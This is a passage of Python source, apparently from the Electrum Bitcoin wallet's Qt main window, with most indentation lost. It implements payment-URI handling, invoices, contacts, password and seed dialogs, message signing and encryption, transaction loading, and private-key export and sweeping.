self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
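# Note: lnaddr.amount is denominated in BTC, hence the multiplication by COIN
# above; e.g. an invoice for 0.001 BTC fills the amount field with 100_000 sat.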
def set_onchain(self, b):
self.is_onchain = b
self.preview_button.setEnabled(b)
self.max_button.setEnabled(b)
self.show_send_tab_onchain_fees(b)
def show_send_tab_onchain_fees(self, b: bool):
self.feecontrol_fields.setEnabled(b)
#self.fee_e_label.setVisible(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
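# Illustrative BIP21 input (address hypothetical):
#   "bitcoin:bc1qexample...?amount=0.01&label=coffee"
# fills payto_e with the address, amount_e with the parsed amount (in satoshis),
# and message_e with "coffee", since the label doubles as description here.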
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.set_onchain(len(coins) > 0)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
            self.show_error(_('Cannot find payment request in wallet.'))
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
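        # Expose each Commands method in the console namespace as a closure that
        # forwards the method name, the arguments, a password-prompt callback and
        # the open wallet to Commands._run.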
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
        warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must back up your wallet file every time you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(QLabel(_('Lightning')), 5, 0)
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt) -> Optional[Transaction]:
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
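            # Export the keys on a background thread (throttled with a short sleep)
            # so the GUI stays responsive; progress and completion are reported
            # back to the dialog via Qt signals.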
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
